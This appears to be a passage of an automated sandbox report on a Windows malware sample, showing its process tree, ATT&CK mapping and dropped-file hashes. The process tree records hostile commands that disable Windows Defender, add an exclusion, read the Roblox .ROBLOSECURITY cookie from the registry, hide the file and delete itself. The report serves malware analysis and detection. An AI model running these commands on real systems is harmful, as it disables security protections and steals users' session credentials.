C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name56⤵
- Detects videocard installed
PID:3768
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause56⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4788 -
C:\Windows\system32\PING.EXEping localhost57⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"55⤵
- Checks computer location settings
PID:3300 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"56⤵
- System Location Discovery: System Language Discovery
PID:2368
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"56⤵PID:2376
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"56⤵
- Checks computer location settings
PID:5020 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"57⤵
- System Location Discovery: System Language Discovery
PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"57⤵PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"57⤵
- Checks computer location settings
PID:4408 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"58⤵
- System Location Discovery: System Language Discovery
PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"58⤵
- Drops file in Drivers directory
PID:2496 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid59⤵PID:3060
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"59⤵
- Views/modifies file attributes
PID:1876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'59⤵
- Command and Scripting Interpreter: PowerShell
PID:2372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 259⤵
- Command and Scripting Interpreter: PowerShell
PID:3840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY59⤵PID:1048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY59⤵PID:3692
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption59⤵PID:4296
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory59⤵PID:3748
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid59⤵PID:1008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER59⤵PID:1580
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name59⤵
- Detects videocard installed
PID:592
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause59⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3588 -
C:\Windows\system32\PING.EXEping localhost60⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"58⤵
- Checks computer location settings
PID:4076 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"59⤵
- System Location Discovery: System Language Discovery
PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"59⤵PID:4836
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"59⤵
- Checks computer location settings
PID:1820 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"60⤵
- System Location Discovery: System Language Discovery
PID:4404
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"60⤵PID:3996
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"60⤵PID:1720
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Ondrive.exeC:\Users\Admin\AppData\Roaming\Ondrive.exe1⤵
- Executes dropped EXE
PID:436
-
C:\Users\Admin\AppData\Roaming\Ondrive.exeC:\Users\Admin\AppData\Roaming\Ondrive.exe1⤵PID:5024
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
319B
MD591046f2e147049d3e53cd9bf9d4d95ed
SHA1228e347d062840b2edcbd16904475aacad414c62
SHA256ea92f8291b86440b98162409b1f9f04470455c22be01a1480ea5ebc37eb168dc
SHA512071a9c6e17760a726c3a4519cf8006f36f17f50946af0129e0e1f3e480f6b7fcc804a7614b044247f2420a8b2b46bec5b8493e4869bb918bc7c0f6aa1346c3e0
-
Filesize
1KB
MD54c8fa14eeeeda6fe76a08d14e08bf756
SHA130003b6798090ec74eb477bbed88e086f8552976
SHA2567ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5
SHA512116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5227556da5e65f6819f477756808c17e4
SHA16ffce766e881ca2a60180bb25f4981b183f78279
SHA256101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4
SHA512d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a
-
Filesize
948B
MD5e136966aba3500e5d57bcfc57edb3be1
SHA13dc5f1c1888b68da52706fb5fb053a86d5ac4c8d
SHA25655f1c311ffec50f6d364764298fcb3172f034ad47b32eea2941bdaab95e369b0
SHA512118f09f6b0a690641abbae52d5e4fa71493553eadcaee9639e59d671ce64576709b3ec3d94e9cfd066f94774590f76de0796d503c73e432f0f3412f5a97aed81
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD5543dc8ef6b28b125dde7a95b6f938d75
SHA10ff96a1bed75d1676eab66a5a4de8fd6fc02d94c
SHA256394d4a748636e535115784ce4807dcc29336aae29deae41e56c2ef271e47891c
SHA51299ae3b94c9a80ff141e5e27dde2d37ad1df3ad344e2e7fb54d133ea3153af6084634ec906f7e0a20b8197ecca1757bbe789801ac31302d4a505ac9db9b9bf92e
-
Filesize
944B
MD5ade086e87bb9cf928b80c5f6140dc138
SHA1aca5940867d10be2ea4448f1d9fd6bfc7bcd3357
SHA25677c31c5fbd51621d5676f51e97d234b9fef18eee6ee833cc698398c90d6d1eac
SHA51278b607977c295a97c09f3911ecc66fce0e9dde53d9b4dbaae228bdc7111bf7ef4186f6cd12882079e9f7fc1ff6172c765da77111cd4dc4cfc1c4a408ff8f7b4d
-
Filesize
944B
MD5c6eeae2b8c20a613e264c31e93319fa3
SHA11d35c414ff9078d31fe36f243143f3a340872953
SHA2561fff11c3a0217aa5cefc4bff221979d45517869a1830ed69f99e6b7d68f6cbb3
SHA5127895e4a1cc49313cde6baf8642e42466f8813b79f140368ac065e484b121c25ba7d80d9da2b75b7079a3712632e8a79b54bf4b68a1067b6555a836b71b321312
-
Filesize
944B
MD5889d931598e363b41b981b99283e4f67
SHA1bfc3c04db134462a49ffa0f09c5ce6ee00dfbf03
SHA2566eb9970d2737d1bd89c907de3c3fdb59f06c0f35c2321c4070021034866bc1d7
SHA5124bac7feed3bd869c3039a1e4004ba11e6ab55558c3dcf13bfeaf10dab4aba2b40f0e78cb0e01e92e3cd14def83a4814509a693cf483c6558848bb7d65ce68dcc
-
Filesize
64B
MD5a23367bfc7bcc2e267fe31a25f44beae
SHA1f60276f35f85892f4c03feb73c305bd124604a6e
SHA256c7835e80b42b0dfb299436cca04d4226db5a3ae4d991e5d1b5570e20a03f088d
SHA51222b871e64a6543fad4da3477d3789cd3939a28702665c928b8fd1e0770c61c1ac6b0ac23aaf411b4368c1ccce99ac65ea34ed23aa922447b3da661cabc8fdee8
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
948B
MD5f4bf3ca8753d6bb9725419fec1ec74b9
SHA171fce9d17d1d92873236a9a827c52eb9e4827f3d
SHA256ca8697e4ada4c3d4aac2899b8aad4052ccd605fccee05ee0a831368bde2f7417
SHA512a55a107ae8bcf833ea674413c765cd55096146c9634dff41884fcc851c12fe47753308099525c99ae44883facfb668c8b292dd915263f34ebd1190391cb28a54
-
Filesize
1KB
MD5567d7fef99fd45b4def9fa7b093384e2
SHA1e6a0a4657276cca5142193ad980e34d1ed382f41
SHA2567ec7b5f3f860f6b4a326dcc883a2bd3f57bac0a5774418b48e3ef54c2cd2893c
SHA512f45b7876ae0e3eac9dee187f2b901da361caf20e2aebc545408a95f6926a2b3a13233392d085487a76e6972784877637576bf8f9b644c0d59cea02f9177aa711
-
Filesize
64B
MD5f8a8f51781c8594d6c320478042fe611
SHA17126e45bfde17c39b576f3278ab939aee8616c94
SHA256461f1fd93db44513e73fab0d44fdac1b44c8e7d2abc0dfe737cd767246cb1949
SHA5125f596eb90514113579e0f5999d87d9b1538b45b7704af89923507c610a0a8bcf2ce914ac05ff78ebd91ef5f727e428fbea6afad6fbd0bfa515c57b475a41d804
-
Filesize
948B
MD5929c856a9f5f4fd187b9b324e39be583
SHA1b5d74d5b632f2b0d892c0b763f7f9c36f8677fec
SHA25667fc49d5d72ee25add82821193e326f1109d7b88189560492686a8f9d8b6c97e
SHA5125746885b047af646bee26dc965c2fea100c395b2cc89a868af5d5858dd273497c3ea2f567c11439a84502cceea001a661352b8d0873c2cf09b1697c583fc61dd
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
944B
MD52979eabc783eaca50de7be23dd4eafcf
SHA1d709ce5f3a06b7958a67e20870bfd95b83cad2ea
SHA256006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903
SHA51292bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
20KB
MD5e2123a750f5cb851df1893bd7aaf14b5
SHA1360f4dc6b9d3c31e8ce1c2c65bf04812d7eb2fb2
SHA256b2190ee4cd10929bd3f8a7280cd6b771d99b72c9ce832464633d9d2767c400f2
SHA512408881589a5e2bca5f6aed0061b435a4fa6600984fffa911fbab3a94f20db7f8c7f3cd4a7c1dd5336d45c575fb2874b581c16f3b8ab0c5ab68c12a50d289f138
-
Filesize
227KB
MD5550b445ad1a44d1f23f7155fae400db6
SHA1cb006a53156285fdef3a0b33a4a08f534cd3bab7
SHA256d223b3918e8bc3bab1d23fdc2e306be1c6587d3ab8f324fc377e37585387884e
SHA512909f31f24672ffc5542ac42f344eb6020bcdfdfac9ac13d5672fe7ed22e686b06385d15709f1f83b576b1dade591ad40eb429ef076d07f4597235cd95a679fa5
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
71KB
MD5f9b08bd21b40a938122b479095b7c70c
SHA1eb925e3927b83c20d8d24bdab2e587c10d6ac8cd
SHA256c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8
SHA512fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
260B
MD5678c407bc3b7aefee92066690f2908d3
SHA1c822920ac175102923b8cf44aa035cc447501337
SHA256c40e46accf5aceece1ca5e5b24aaba03cbe8063779b92aea2a50c28bc0fc761b
SHA51220c7487ca59bb8e65c558cbf1d7dcacd3530ae1012d7a54bc056d197ffd8405daf7f97cd7ac31c5a7137ba82ce4083ad1022b7457e0b453a2b4059d9f06a1f4c
-
Filesize
423KB
MD52dd10fd7272ddbcef1d254174e5b37f7
SHA1f908458013c51f91dd27be88f6d759036752b684
SHA256a6f452376ae299529d517fbe4c43fba9a7965e25e0fff9359552f9837a272bfa
SHA512edea4ce2205f64d963229b9c3882f797cb1132ca5f29f88d9b7b5d45390aead227121c3c96fd0da1c566bde5254333d2946d961ad097f8bafb64543b113a5b3d
-
Filesize
5.4MB
MD5916f7dea6831485387d70b0891455e65
SHA1176e995cc2584d7c9703b2beee0994dcc4be91d5
SHA256c47e49026afb1d2c8708f1e36510ad862eb288c7ac48e9c4bebfbd051475fbc2
SHA512ba5c40e6416a53c88f5b5d7e0ce346956ef6bd0aebed355df8070ebb71dda78125945fe1cdca87caa29a2b5d98c437bafd228396a516c91f764256e54556f0e4
-
Filesize
23KB
MD532fe01ccb93b0233503d0aaaa451f7b2
SHA158e5a63142150e8fb175dbb4dedea2ce405d7db0
SHA2566988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43
SHA51276945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6
-
Filesize
37KB
MD5b37dd1a1f0507baf993471ae1b7a314c
SHA19aff9d71492ffff8d51f8e8d67f5770755899882
SHA256e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc
SHA512ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460
-
Filesize
2KB
MD54028457913f9d08b06137643fe3e01bc
SHA1a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b